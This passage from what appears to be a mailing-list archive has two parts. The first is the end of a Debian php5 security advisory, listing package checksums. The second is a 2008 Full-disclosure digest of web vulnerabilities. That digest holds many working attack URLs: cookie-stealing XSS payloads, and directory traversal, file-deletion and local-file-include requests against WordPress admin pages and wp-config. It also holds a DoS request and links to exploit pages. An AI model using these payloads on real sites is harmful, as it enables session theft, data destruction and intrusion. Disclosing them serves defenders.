  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:   342144 061faf6f5dbcd99a7bfd2373f55d28dd
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:   218288 42c46ad86cb563d3f12d4d4b293582d7
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    37712 9b92739cf4b001aa87c9a63bde5a7718
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    19178 dffa98f0124f240c3039e6c6fbce1302
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    35996 610f91206b5eed952e0343e8cf99b6ce
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    10106 b1b914ddac45b7b775246eabdb7b3e87
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    14744 6751b9ce18560362df7dd5c5b99ef3c3
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    12696 157cadc3fbe7c5c035f9c857374f6e82
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:  2465544 a8ec0bc80282b7822e017cf44cfd5357
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    18458 87904fa8c47e0edd37aada96ce48cffe
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    19182 e65cf71b220cf8285199bf26f028b8a2
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    13754 6da392678ba54b1e2336d1bdac4b2d96
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    38018 4bc09fdad9d896ed63ffecb2686ec99a
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    36312 c33b7c7328a5d58e1e31132e9b54f626
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:  2515144 424bba8dbeeefbbc342fe2aca8369247
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    12696 4f155f013111823f91ca622d32c3ccf8
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:     6742 71ba1ed48fac0882c25d25ff368e2954
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:  4897916 a1d3dab1092c0a9db396860f7a91ba2c
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:    54040 a17e58c1874a192822815087bf7005ea
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_powerpc.deb
    Size/MD5 checksum:  2515672 45137c39bfafa49ddb8fee22dba548aa
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_powerpc.deb
    Size/MD5 checksum:    54036 e63dfa0d7fd89e38d987b215cd783d20

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:  5034458 0c812fc7e4633caebddde9694220b1f8
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    37252 b43090877798d56187491ad6c61430a2
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:     5108 930bb3f68cd7a882f686fd295bdcd52e
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    37252 ea0c6190e057ca0bd1ee5615eb733a73
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    72576 7ab971ebbde629a327f9ededcf643d49
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    19328 a33635688df17ea3c112247c4a60c13b
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    19330 38640be2f7fd52f92e282c909ddb832e
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:  2609706 0b0152099b17b0ea62a8612e48ce5bee
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    18182 7c24136e683d84a226e5af9e6d6128b9
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    39180 8166fcf9116ec603fc3a4898d542ad27
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    13444 c7e0ab1b9c4be82c24a657b025d4f21a
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:  2610592 e1696ca2b132441d84685fff22fe390a
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    40522 7902a4e8840eeef9101aceb124d3d57a
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    37176 be86868f8715395847e57fec02783add
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:     5118 78d77bfe01f8b90eab1d7a481c2284c9
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:  2609044 1d5c7ce92234e9bc595a002278a27e84
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:     9190 ac473baeb26301752842cb2ced65114e
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    39184 afe1b482b1b552cf75a38c20e136ba75
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:   342058 04c49f8368c4404c9a39a7bfc51e6fcf
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:     9180 9711dca676560c44b3112be2287d4b2d
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    56324 c834ca90984e972d525a56952a496ad5
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    19592 aed64707fb7d24c31e39be41db3413d0
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    13396 9b79b59c124558e66a82d91a28e379dc
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    36084 48234dbc2db3b368958fe4c13834c053
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    18176 623c457f0fcc1841ac35b668e968766d
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:  2537750 c046a32cbbd4b3a2fd6645c6ba35f52d
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    56316 058f048861b657b3de48adc357e90166
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:     5478 c1739f755c92f0c2d4ba21092f8b894e
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    11952 fe0d7ab81216db22cee50cccda313e4f
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:   342062 27c9d61c7d07ce4b78fd491a0912f73c
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    13400 11c384a487a7b1491af95483fda73afd
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    25022 73715319ea8e7b78211ef7b5464aed19
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    19586 fe8e94414aa4da4010c366525c45de82
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    36080 24e49013d05c56789f326cee8cbda9ac
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    72578 f9af1652c298d7bcaaa8bb8bc2d89453
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:  2609588 a69dc7a2b66aa81d96647c1cb148dd58
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    37178 e092fc9a7040ca6409a2f0d0edb13094
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    11960 36b151c52dec82fa94ea91d2fa7dc3be
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:     5468 335610031763d4cc12f95184486dbadb
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:  5035632 ef6f870903ef4ee85488e98b703f24c9
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:   220316 c884a33891a4fb02c6c93f20224fd598
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    13442 3253ab1775ccaf63855b28cae6f11bba
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:  2538596 f0848822d0fea9a5d9a221ef8171a22e
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum:    40526 980e0b60b30123b63e9900d409c8897e
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:   220166 eb6b0530dfc7872d8f26dc780d774301
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum:    25024 0319d2bb135bad651db7c837d1a3ef71

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    16238 2e7e9b8ab0a2c08e5196f48f3ba8e02e
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    32576 bb9fe4963a5711bf039c28f8d2892dc3
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    16578 416cbb879ba23ad867933c1595e62eb7
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    17444 197c152845cea014f4f921ea89a0e386
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    24626 74a449dd78ee441e09635f645b67f4b1
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:  2404932 59990e6b8d57245b29b5813b69a62ad4
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:  4670662 075be3e5eac42ab7933727ec09fbedac
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    10766 a94261cd688d3ff7c64923ef2d1a7a28
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:     4864 f2b42bc3448bc85aacdc714384ed5bf7
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    34906 e8a660c13a1bf1d35a5e712872b2a478
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:   214458 76a4e7e6811def8855f2ea217e1f37bb
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    62200 3451c54f15ece8bfc0672d04342b46b1
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    11678 5807d2d8c22d6abf72a7fba7a4bfea17
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    33184 66796603ff55635024689bb8490699bc
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:     8270 1cf90c3f991e4a9510e01bf5e3bba4c9
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:  2405902 8981fb5589bf7c499c2d166369c40ad9
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    34906 2776940111a53faf5d2767bfbb4119f7
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    33096 68ac2d3c9bb8238beeb4e0a82a91d3af
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    47908 573b43b0c6553fe0cee381af5177885c
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    62198 3665d88d02686919b42def31ea079d4d
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:  4672026 41db855cfc3a1bd7b2bdcde31616d8fe
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    11674 2fe495656ab1fb1cb8b8f4ad17b68807
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:     8268 0a232e1533bb9a18c5a24295b575e2fc
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    16576 7301ae9782758b661c0542c6c4709915
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    47908 2701d2f9562c8ed980b34435ca2d2ed6
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    10766 231e1ec6b50e3b88671c64130ff31d03
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:     4864 70a59260e4a7d669f63536d822afc0a0
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:   342128 b1461c255c50b64c374f22bb4deed67a
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    12620 d323f669c911157aec3ed04b28fe7a79
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    16238 691416f8670c78cb7714d3a58e709458
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:  2405686 2bf60f8fe3667c45fb6c4ea9da2b423c
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:  2354794 3071ff8848fdbed3526cc94532e40264
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:     4638 dbb58cfc47cdf65e59b7529ca59d42de
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    32574 13f0e77899697db4cc0d28eaa90155b3
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:  2406656 0401fc601122ae05b921f25ab37b95b1
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:   214298 62a72421e29c87c4ce68d4f6e5bd9b7a
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    31514 b73d8ae66da8f0d8fb949529a6282988
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    17442 44afc84d1e432f202cbaca3cf53f9cbd
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    24626 ece890b19b6e28e0bbb88f1014c24c96
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:     4638 5670a32e9cb61a2762d7b96f6ff3867a
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    31512 b9303d5095a2f3205ba9e78b9a7eb77c
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:  2354006 570f316a7cf6c7a77ba346ccc7c45b24
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:    12618 b530e37e9474a5f9ecb325fa78970ff6
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum:   342146 983c0a1ec54b68681c3204a06101acc6
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    33188 7c20faa759f6deecca82800ad4bf2854
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum:    33092 9f74b6bce6a279ea6d0af0cab7f0d067


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHfUR0Xm3vHE4uyloRArZEAJ43MLpFvfL8pzR4DAKA5lzW87+dewCgkMEr
hVmHymytYZeuBXazRrsxpuQ=
=OIyH
-----END PGP SIGNATURE-----



From 3APA3A at SECURITY.NNOV.RU  Thu Jan  3 20:50:08 2008
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Thu, 3 Jan 2008 23:50:08 +0300
Subject: [Full-disclosure] securityvulns.com russian vulnerabilities digest
Message-ID: <854896555.20080103235008@SECURITY.NNOV.RU>

Dear bugtraq,

  Below    is    a    digest    of    vulnerabilities    published    by
  http://securityvulns.com/ and believed to be previously unpublished in
  English.    All    vulnerabilities    were    reported   by   MustLive
  (http://websecurity.com.ua/).

  1. AwesomeTemplateEngine Crossite scripting

  Multiple crossite scripting (require register_globvals):

http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

  Original article (in Russian): http://securityvulns.ru/Sdocument784.html
  Additional details (in Ukrainian): http://websecurity.com.ua/1694/

  2. Wordpress multiple security vulnerabilities:

   2.1 information disclosure (WordPress 2.2/2.3)

    Invalid request disclosures database structure and local paths:

       http://site/?feed=rss2&p=1
   
    Original article (in Russian): http://securityvulns.ru/Sdocument663.html
    Additional details (in Ukrainian): http://websecurity.com.ua/1634/
    
   2.2 crossite scripting (WordPress <= 2.0.9)

http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22

    Original article (in Russian): http://securityvulns.ru/Sdocument714.html
    Additional details (in Ukrainian): http://websecurity.com.ua/1658/

   2.3  Directory  traversal, Arbitrary file deletion, Denial of Service
   and Cross-Site Scripting via wp-db-backup.php

   Directory Traversal (WordPress <= 2.0.3):
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

   Arbitrary file deletion and DoS (WordPress <= 2.0.3):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php

   XSS (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E

  Original article (in Russian): http://securityvulns.ru/Sdocument755.html
  Additional details (in Ukrainian): http://websecurity.com.ua/1676/

  2.4  Local  file include, Directory traversal and Full path disclosure
  (WordPress  <=  2.0.11  and potentially 2.1.x, 2.2.x, 2.3.x)

  Full path disclosure:

http://site/wp-admin/admin.php?import=\..\..\wp-config
http://site/wp-admin/themes.php?page=
http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/templates.php?file=
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=
http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=

  Local file include and Directory traversal:

http://site/wp-admin/admin.php?import=\..\..\file
http://site/wp-admin/themes.php?page=\..\..\file.php
http://site/wp-admin/themes.php?page=\..\..\.htaccess
http://site/wp-admin/edit.php?page=\..\..\file.php
http://site/wp-admin/edit.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\file.php
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/templates.php?page=\..\..\file.php
http://sites/wp-admin/templates.php?page=\..\..\.htaccess
http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess
http://site/wp-admin/categories.php?page=\..\..\.htaccess
http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess
http://site/wp-admin/moderation.php?page=\..\..\.htaccess
http://site/wp-admin/post.php?page=\..\..\.htaccess
http://site/wp-admin/page-new.php?page=\..\..\.htaccess
http://site/wp-admin/index.php?page=\..\..\file.php
http://site/wp-admin/index.php?page=\..\..\.htaccess
http://site/wp-admin/link-manager.php?page=\..\..\.htaccess
http://site/wp-admin/link-add.php?page=\..\..\.htaccess
http://site/wp-admin/link-categories.php?page=\..\..\.htaccess
http://site/wp-admin/link-import.php?page=\..\..\.htaccess
http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess
http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess
http://site/wp-admin/profile.php?page=\..\..\.htaccess
http://site/wp-admin/users.php?page=\..\..\.htaccess
http://site/wp-admin/options-general.php?page=\..\..\.htaccess
http://site/wp-admin/options-writing.php?page=\..\..\.htaccess
http://site/wp-admin/options-reading.php?page=\..\..\.htaccess
http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess
http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess
http://site/wp-admin/options-misc.php?page=\..\..\.htaccess
http://site/wp-admin/import.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess
http://site/wp-admin/cat-js.php?page=\..\..\.htaccess
http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess
http://site/wp-admin/options.php?page=\..\..\.htaccess
http://site/wp-admin/profile-update.php?page=\..\..\.htaccess
http://site/wp-admin/sidebar.php?page=\..\..\.htaccess
http://site/wp-admin/user-edit.php?page=\..\..\.htaccess

  Arbitrary file edit:

http://site/wp-admin/templates.php?file=\..\..\file

  Attacks with backslash are possible in Windows version.

  Original article (in Russian):
           http://securityvulns.ru/Sdocument762.html
           http://securityvulns.ru/Sdocument768.html
           http://securityvulns.ru/Sdocument773.html
           http://securityvulns.ru/Sdocument772.html
  Additional detail (in Ukrainian):
           http://websecurity.com.ua/1679/
           http://websecurity.com.ua/1683/
           http://websecurity.com.ua/1686/
           http://websecurity.com.ua/1687/


3. Crossite scripting and Denial of Service in PRO-Search <= 0.17

 XSS:

http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

 Denial of Service:

http://site/?show_page=20000&time=0

 Original article (in Russian): http://securityvulns.ru/Sdocument731.html
 Additional details (in Ukrainian): http://websecurity.com.ua/1259/

4.  Persistant  crossite scripting and request forgery in WP-ContactForm
<= 1.5 alpha (WordPress plugin)

 POST request to

http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php

 with different form fields.

 Exploits:

          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS2.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS3.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS4.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF5.html
          http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS5.html
